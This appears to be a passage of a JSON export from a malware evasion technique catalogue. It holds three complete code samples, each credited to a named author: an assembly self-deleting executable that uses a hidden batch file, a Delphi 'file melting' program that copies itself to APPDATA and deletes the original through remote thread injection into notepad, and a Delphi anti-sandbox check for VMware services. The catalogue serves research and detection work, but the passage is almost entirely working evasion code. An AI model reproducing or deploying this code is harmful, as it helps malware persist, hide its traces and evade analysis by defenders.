"plain_code": "include 'win32ax.inc'\r\n\r\nmain:\r\n\r\n\r\n\r\n stdcall [GetModuleFileName],0,modulename,80\r\n stdcall [CreateFile],BatFile,GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0\r\n\r\n mov [myfile], eax\r\n cmp eax, 0xffffff\r\n jz .exit\r\n\r\n stdcall [wsprintf],buf,MainStr,modulename,modulename\r\n stdcall [WriteFile],[myfile],buf,bufsize,byteswritten,0\r\n stdcall [CloseHandle],[myfile]\r\n\r\n\r\n stdcall [ShellExecute],0,0,BatFile,0,0,SW_HIDE\r\n\r\n.exit:\tstdcall [ExitProcess],0\r\n\r\n\r\n\r\n MainStr db \":Repeat\",13,10,\\\r\n\t \"del %s\",13,10,\\\r\n\t \"if exist %s goto Repeat\",13,10,\\\r\n\t \"del del.bat\",0\r\n\r\n BatFile db \"del.bat\",0\r\n\r\n modulename rb 80\r\n buf\t rb\t0xff\r\n bufsize = $ - buf\r\n\r\n myfile \t\t dd ?\r\n byteswritten\t dd ?\r\n\r\ndata import\r\nlibrary kernel32,\"kernel32.dll\",user32,\"user32.dll\",shell32,\"shell32.dll\"\r\ninclude \"%include%/api/shell32.inc\"\r\ninclude \"%include%/api/kernel32.inc\"\r\ninclude \"%include%/api/user32.inc\"\r\nend data"
},
{
"id": 62,
"language": {
"id": 1,
"label": "Delphi",
"code_class": "Delphi"
},
"user": {
"id": 4,
"username": "DarkCoderSc",
"email": "jplesueur@proton.me",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/167/?format=api",
"description": "",
"plain_code": "{\r\n 32Bit Example of File Melting\r\n}\r\n\r\nprogram Melt;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\n{$R *.res}\r\n\r\nuses\r\n System.SysUtils,\r\n WinAPI.Windows,\r\n shlobj;\r\n\r\n\r\ntype\r\n TRemotePointer = record\r\n Address : Pointer;\r\n Size : Cardinal;\r\n end;\r\n\r\n TMeltThreadInfo = record\r\n // WinAPI\r\n GetProcAddress : Pointer;\r\n LoadLibrary : Pointer;\r\n GetLastError : Pointer;\r\n ExitProcess : Pointer;\r\n DeleteFileW : Pointer;\r\n Sleep : Pointer;\r\n WinExec : Pointer;\r\n\r\n // Str\r\n sTargetFile : Pointer;\r\n sExecFile : Pointer;\r\n end;\r\n PMeltThreadInfo = ^TMeltThreadInfo;\r\n\r\n{\r\n Generate an exception message with Last Error Information\r\n}\r\nfunction GetLastErrorMessage(AFuncName : String) : String;\r\nbegin\r\n result := Format('\"%s\" call failed with LastError=[%d], Message=[%s].', [\r\n AFuncName,\r\n GetLastError(),\r\n SysErrorMessage(GetLastError())\r\n ]);\r\nend;\r\n\r\n{\r\n Spawn a new hidden process\r\n}\r\nfunction Spawn(APEFile : String) : THandle;\r\nvar hProc : THandle;\r\n b : Boolean;\r\n AStartupInfo : TStartupInfo;\r\n AProcessInformation : TProcessInformation;\r\nbegin\r\n result := INVALID_HANDLE_VALUE;\r\n ///\r\n\r\n ZeroMemory(@AProcessInformation, SizeOf(TProcessInformation));\r\n ZeroMemory(@AStartupInfo, SizeOf(TStartupInfo));\r\n\r\n AStartupInfo.cb := SizeOf(TStartupInfo);\r\n AStartupInfo.wShowWindow := SW_SHOW;\r\n AStartupInfo.dwFlags := STARTF_USESHOWWINDOW;\r\n\r\n UniqueString(APEFile);\r\n\r\n b := CreateProcessW(\r\n PWideChar(APEFile),\r\n nil,\r\n nil,\r\n nil,\r\n False,\r\n 0,\r\n nil,\r\n nil,\r\n AStartupInfo,\r\n AProcessInformation\r\n );\r\n\r\n if not b then\r\n raise Exception.Create(GetLastErrorMessage('CreateProcessW'));\r\n\r\n ///\r\n result := AProcessInformation.hProcess;\r\nend;\r\n\r\n{\r\n Melt File using Process Injection Technique\r\n}\r\n\r\nprocedure MeltThread(pInfo : PMeltThreadInfo) ; stdcall;\r\nvar _GetLastError : function() : DWORD; stdcall;\r\n _ExitProcess : procedure(uExitCode : UINT); stdcall;\r\n _DeleteFileW : function(lpFileName : LPCSTR) : BOOL; stdcall;\r\n _Sleep : procedure(dwMilliseconds : DWORD); stdcall;\r\n _MessageBox : function(hWindow : HWND; lpText : LPCWSTR; lpCaption : LPCWSTR; uType : UINT):integer;stdcall;\r\n _WinExec : function(lpCmdLine : LPCSTR; uCmdShow : UINT) : UINT; stdcall;\r\nbegin\r\n @_GetLastError := pInfo^.GetLastError;\r\n @_ExitProcess := pInfo^.ExitProcess;\r\n @_DeleteFileW := pInfo^.DeleteFileW;\r\n @_Sleep := pInfo^.Sleep;\r\n @_WinExec := pInfo^.WinExec;\r\n\r\n while not _DeleteFileW(pInfo^.sTargetFile) do begin\r\n if (_GetLastError = ERROR_FILE_NOT_FOUND) then\r\n break;\r\n ///\r\n\r\n _Sleep(100);\r\n end;\r\n\r\n _WinExec(PAnsiChar(pInfo^.sExecFile), SW_SHOW);\r\n\r\n _ExitProcess(0);\r\n\r\n /// EGG\r\n asm\r\n mov eax, $DEADBEAF;\r\n mov eax, $DEADBEAF;\r\n end;\r\nend;\r\n\r\nprocedure DoMelt_Injection(ATargetFile, AExecFile : String);\r\nvar hProc : THandle;\r\n ABytesWritten : SIZE_T;\r\n AInfo : TMeltThreadInfo;\r\n p : Pointer;\r\n AThreadID : DWORD;\r\n AThreadProc : TRemotePointer;\r\n AInjectedInfo : TRemotePointer;\r\n hKernel32 : THandle;\r\n pSysWow64 : PWideChar;\r\n\r\n function FreeRemoteMemory(var ARemotePointer : TRemotePointer) : Boolean;\r\n begin\r\n result := False;\r\n ///\r\n\r\n if (NOT Assigned(ARemotePointer.Address)) or (ARemotePointer.Size = 0) then\r\n Exit();\r\n\r\n result := VirtualFreeEx(hProc, ARemotePointer.Address, ARemotePointer.Size, MEM_RELEASE);\r\n\r\n ZeroMemory(@ARemotePointer, SizeOf(TRemotePointer));\r\n end;\r\n\r\n function InjectBuffer(pBuffer : PVOID; ABufferSize : Cardinal) : TRemotePointer;\r\n begin\r\n ZeroMemory(@result, SizeOf(TRemotePointer));\r\n ///\r\n\r\n result.Size := ABufferSize;\r\n result.Address := VirtualAllocEx(hProc, nil, result.Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);\r\n if result.Address = nil then\r\n raise Exception.Create(GetLastErrorMessage('VirtualAllocEx'));\r\n ///\r\n\r\n if not WriteProcessMemory(hProc, result.Address, pBuffer, result.Size, ABytesWritten) then begin\r\n FreeRemoteMemory(result);\r\n\r\n raise Exception.Create(GetLastErrorMessage('WriteProcessMemory'));\r\n end;\r\n end;\r\n\r\n function InjectStringW(AString : String) : TRemotePointer;\r\n begin\r\n result := InjectBuffer(PWideChar(AString), (Length(AString) * SizeOf(WideChar)));\r\n end;\r\n\r\n function InjectStringA(AString : AnsiString) : TRemotePointer;\r\n begin\r\n result := InjectBuffer(PAnsiChar(AString), (Length(AString) * SizeOf(AnsiChar)));\r\n end;\r\n\r\n function GetFuncSize(pFunc : Pointer) : Cardinal;\r\n {\r\n This is a very dumb but working technique, we scan for our special pattern to\r\n get the address of our last MeltThread instruction.\r\n\r\n We skip all epilogue instructions since the thread will end the parent process.\r\n\r\n Other techniques exists to know the exact size of a function but is not required\r\n for our example.\r\n }\r\n var I : Integer;\r\n pCurrentRegion : Pointer;\r\n AFound : Boolean;\r\n\r\n const EGG : array[0..5-1] of Byte = ($B8, $AF, $BE, $AD, $DE);\r\n begin\r\n I := 0;\r\n AFound := False;\r\n\r\n while True do begin\r\n pCurrentRegion := Pointer(NativeUInt(pFunc) + I);\r\n\r\n if CompareMem(pCurrentRegion, @EGG, Length(EGG)) then begin\r\n if AFound then begin\r\n result := I - Length(EGG);\r\n\r\n break;\r\n end;\r\n\r\n AFound := True;\r\n end;\r\n\r\n Inc(I);\r\n end;\r\n end;\r\n\r\nbegin\r\n GetMem(pSysWOW64, MAX_PATH);\r\n try\r\n SHGetSpecialFolderPathW(0, pSysWOW64, CSIDL_SYSTEMX86, False);\r\n finally\r\n FreeMem(pSysWOW64, MAX_PATH);\r\n end;\r\n\r\n hProc := Spawn(Format('%s\\notepad.exe', [String(pSysWOW64)]));\r\n try\r\n ZeroMemory(@AInfo, SizeOf(TMeltThreadInfo));\r\n\r\n {\r\n Prepare Thread Parameter\r\n }\r\n hKernel32 := LoadLibrary('kernel32.dll');\r\n\r\n AInfo.GetLastError := GetProcAddress(hKernel32, 'GetLastError');\r\n AInfo.ExitProcess := GetProcAddress(hKernel32, 'ExitProcess');\r\n AInfo.DeleteFileW := GetProcAddress(hKernel32, 'DeleteFileW');\r\n AInfo.Sleep := GetProcAddress(hKernel32, 'Sleep');\r\n AInfo.GetProcAddress := GetProcAddress(hKernel32, 'GetProcAddress');\r\n AInfo.LoadLibrary := GetProcAddress(hKernel32, 'LoadLibraryW');\r\n AInfo.WinExec := GetProcAddress(hKernel32, 'WinExec');\r\n\r\n AInfo.sTargetFile := InjectStringW(ATargetFile).Address;\r\n AInfo.sExecFile := InjectStringA(AnsiString(AExecFile)).Address;\r\n try\r\n AThreadProc := InjectBuffer(@MeltThread, GetFuncSize(@MeltThread));\r\n\r\n AInjectedInfo := InjectBuffer(@AInfo, SizeOf(TMeltThreadInfo));\r\n\r\n if CreateRemoteThread(hProc, nil, 0, AThreadProc.Address, AInjectedInfo.Address, 0, AThreadID) = 0 then\r\n raise Exception.Create(GetLastErrorMessage('CreateRemoteThread'));\r\n\r\n WriteLn('Done.');\r\n except\r\n on E: Exception do begin\r\n TerminateProcess(hProc, 0);\r\n\r\n raise;\r\n end;\r\n end;\r\n finally\r\n CloseHandle(hProc);\r\n end;\r\nend;\r\n\r\n{\r\n Program Entry Point\r\n}\r\nvar ACurrentFile : String;\r\n ADestFile : String;\r\nbegin\r\n try\r\n ACurrentFile := GetModuleName(0);\r\n\r\n ADestFile := Format('%s\\%s', [\r\n GetEnvironmentVariable('APPDATA'),\r\n ExtractFileName(GetModuleName(0))\r\n ]);\r\n\r\n if String.Compare(ACurrentFile, ADestFile, True) = 0 then begin\r\n {\r\n After Melt (New Installed Copy)\r\n }\r\n\r\n WriteLn(Format('Melt successfully. I''m running from \"%s\"', [ACurrentFile]));\r\n WriteLn('Press enter to exit.');\r\n Readln;\r\n end else begin\r\n {\r\n Melt Instance\r\n }\r\n WriteLn('Install our copy and initiate file melting...');\r\n\r\n if NOT CopyFile(\r\n PWideChar(ACurrentFile),\r\n PWideChar(ADestFile),\r\n False) then\r\n raise Exception.Create(Format('Could not copy file from \"%s\" to \"%s\"', [ACurrentFile, ADestFile]));\r\n\r\n DoMelt_Injection(ACurrentFile, ADestFile);\r\n end;\r\n except\r\n on E: Exception do\r\n Writeln(E.ClassName, ': ', E.Message);\r\n end;\r\nend."
},
{
"id": 61,
"language": {
"id": 1,
"label": "Delphi",
"code_class": "Delphi"
},
"user": {
"id": 4,
"username": "DarkCoderSc",
"email": "jplesueur@proton.me",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/6/?format=api",
"description": "Two methods are demonstrated in this example (Windows Registry and Windows Service Manager API).",
"plain_code": "program AntiSandboxScanService;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\n{$R *.res}\r\n\r\nuses\r\n System.SysUtils,\r\n WinAPI.Windows,\r\n WinAPI.WinSvc;\r\n\r\n\r\nconst ANTI_LIST : array[0..4-1] of String = (\r\n // VMWare\r\n 'VGAuthService',\r\n 'vmvss',\r\n 'vm3dservice',\r\n 'VMTools' \r\n // ...\r\n);\r\n\r\n{\r\n Using Service Manager WinAPI + OpenService()\r\n\r\n * https://docs.microsoft.com/en-us/windows/win32/api/winsvc/nf-winsvc-openscmanagerw\r\n * https://docs.microsoft.com/en-us/windows/win32/api/winsvc/nf-winsvc-openservicew\r\n}\r\nfunction CheckService_WinSvc() : Boolean;\r\nvar AServiceManager : SC_HANDLE;\r\n I : Cardinal;\r\nbegin\r\n result := False;\r\n ///\r\n\r\n AServiceManager := OpenSCManagerW(nil, nil, SC_MANAGER_ENUMERATE_SERVICE);\r\n if AServiceManager = 0 then\r\n raise Exception.Create(\r\n Format('Could not open service manager with error=[%s]', [GetLastError()])\r\n );\r\n try\r\n for I := 0 to Length(ANTI_LIST) -1 do begin\r\n if (OpenServiceW(AServiceManager, PWideChar(ANTI_LIST[I]), READ_CONTROL) <> 0) then begin\r\n WriteLn(Format('[*] \"%s\" service found.', [ANTI_LIST[I]]));\r\n\r\n ///\r\n result := true;\r\n end;\r\n end;\r\n finally\r\n CloseServiceHandle(AServiceManager);\r\n end;\r\nend;\r\n\r\n{\r\n Using Microsoft Windows Registry + RegOpenKeyExW\r\n\r\n * https://docs.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regopenkeyexw\r\n}\r\nfunction CheckService_Registry() : Boolean;\r\nconst HIVE : HKEY = HKEY_LOCAL_MACHINE;\r\n PATH = 'SYSTEM\\CurrentControlSet\\Services\\%s';\r\nvar AStatus : Longint;\r\n AKey : HKEY;\r\n I : Cardinal;\r\n APath : String;\r\nbegin\r\n for I := 0 to Length(ANTI_LIST) -1 do begin\r\n APath := Format(PATH, [ANTI_LIST[i]]);\r\n if RegOpenKeyExW(HIVE, PWideChar(APath), 0, KEY_READ, AKey) <> ERROR_SUCCESS then\r\n continue;\r\n try\r\n WriteLn(Format('[*] \"%s\" service found.', [ANTI_LIST[I]]));\r\n\r\n ///\r\n result := true;\r\n finally\r\n RegCloseKey(AKey);\r\n end;\r\n end;\r\nend;\r\n\r\nprocedure Header(ACaption : String);\r\nbegin\r\n WriteLn(StringOfChar('-', 50));\r\n WriteLn(ACaption);\r\n WriteLn(StringOfChar('-', 50));\r\nend;\r\n\r\nbegin\r\n try\r\n Header('Check Service (WinSvc):');\r\n if not CheckService_WinSvc() then\r\n WriteLn('Nothing found so far...');\r\n\r\n WriteLn;\r\n\r\n Header('Check Service (Registry):');\r\n if not CheckService_Registry() then\r\n WriteLn('Nothing found so far...');\r\n\r\n readln;\r\n except\r\n on E: Exception do\r\n Writeln(E.ClassName, ': ', E.Message);\r\n end;\r\nend."
}
]
}
